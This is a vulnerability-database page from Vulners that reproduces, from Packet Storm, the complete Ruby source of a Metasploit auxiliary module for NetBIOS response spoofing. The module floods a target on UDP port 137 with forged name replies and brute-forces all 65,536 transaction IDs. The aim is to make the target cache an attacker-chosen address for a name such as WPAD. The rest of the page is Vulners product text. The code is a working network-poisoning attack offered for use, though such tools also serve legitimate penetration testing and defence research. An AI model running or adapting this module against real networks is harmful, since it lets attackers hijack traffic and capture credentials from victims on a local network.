Vulners
Lucene search
NetBIOS Response Brute Force Spoof
🗓️ 31 Aug 2024 00:00:00Reported by H D Moore, TombKeeper, vvalien, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 220 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',
'Description' => %q{
This module continuously spams NetBIOS responses to a target for given hostname,
causing the target to cache a malicious address for this name. On high-speed local
networks, the PPSRATE value should be increased to speed up this attack. As an
example, a value of around 30,000 is almost 100% successful when spoofing a
response for a 'WPAD' lookup. Distant targets may require more time and lower
rates for a successful attack.
},
'Author' => [
'vvalien', # Metasploit Module (post)
'hdm', # Metasploit Module
'tombkeeper' # Related Work
],
'License' => MSF_LICENSE,
)
register_options(
[
Opt::RPORT(137),
OptString.new('NBNAME', [ true, "The NetBIOS name to spoof a reply for", 'WPAD' ]),
OptAddress.new('NBADDR', [ true, "The address that the NetBIOS name should resolve to", Rex::Socket.source_address("50.50.50.50") ]),
OptInt.new('PPSRATE', [ true, "The rate at which to send NetBIOS replies", 1_000])
],
self.class
)
end
def netbios_spam
payload =
"\xff\xff" + # TX ID (will brute force this)
"\x85\x00" + # Flags = response + authoritative + recursion desired
"\x00\x00" + # Questions = 0
"\x00\x01" + # Answer RRs = 1
"\x00\x00" + # Authority RRs = 0
"\x00\x00" + # Additional RRs = 0
"\x20" +
Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
"\x00" +
"\x00\x20" + # Type = NB
"\x00\x01" + # Class = IN
"\x00\x04\x93\xe0" + # TTL long time
"\x00\x06" + # Datalength = 6
"\x00\x00" + # Flags B-node, unique
Rex::Socket.addr_aton(@fake_addr)
stime = Time.now.to_f
pcnt = 0
pps = 0
print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
live = true
while live
0.upto(65535) do |txid|
begin
payload[0,2] = [txid].pack("n")
@sock.put(payload)
pcnt += 1
pps = (pcnt / (Time.now.to_f - stime)).to_i
if pps > @targ_rate
sleep(0.01)
end
rescue Errno::ECONNREFUSED
print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
live = false
break
end
end
end
print_status("Cleaning up...")
end
def run
connect_udp
@sock = self.udp_sock
@targ_addr = rhost
@targ_port = rport
@targ_rate = datastore['PPSRATE']
@fake_name = datastore['NBNAME']
@fake_addr = datastore['NBADDR']
netbios_spam
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4